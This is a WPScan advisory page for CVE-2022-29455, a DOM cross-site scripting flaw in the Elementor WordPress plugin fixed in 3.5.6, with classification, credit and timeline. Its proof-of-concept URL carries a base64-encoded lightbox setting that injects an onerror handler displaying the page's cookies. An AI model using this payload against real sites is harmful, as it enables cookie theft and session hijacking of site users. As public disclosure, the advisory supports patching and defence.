WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Elementor < 3.5.6 - DOM Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape user input appended to the DOM via malicious Lightbox settings, resulting in a DOM Cross-Site Scripting issue

Proof of Concept

https://example.com/#elementor-action:action=lightbox&settings=ewogICAgInR5cGUiOiAidmlkZW8iLAogICAgInVybCI6ICJodHRwOi8vIiwKICAgICJ2aWRlb1R5cGUiOiAiaG9zdGVkIiwKICAgICJ2aWRlb1BhcmFtcyI6IHsKICAgICAgICAib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbisnICcrZG9jdW1lbnQuY29va2llKSIsCiAgICAgICAgInN0eWxlIjogImJhY2tncm91bmQtY29sb3I6cmVkIgogICAgfQp9

Affects Plugins

elementor
Fixed in version 3.5.6

References

CVE
CVE-2022-29455
URL
https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Rotem Bar

Verified

Yes

WPVDB ID
9758570b-4729-4eef-ad52-b6e922f536d6

Timeline

Publicly Published

2022-06-13 (about 7 months ago)

Added

2022-06-13 (about 7 months ago)

Last Updated

2022-06-13 (about 7 months ago)

Our Other Services

WPScan WordPress Security Plugin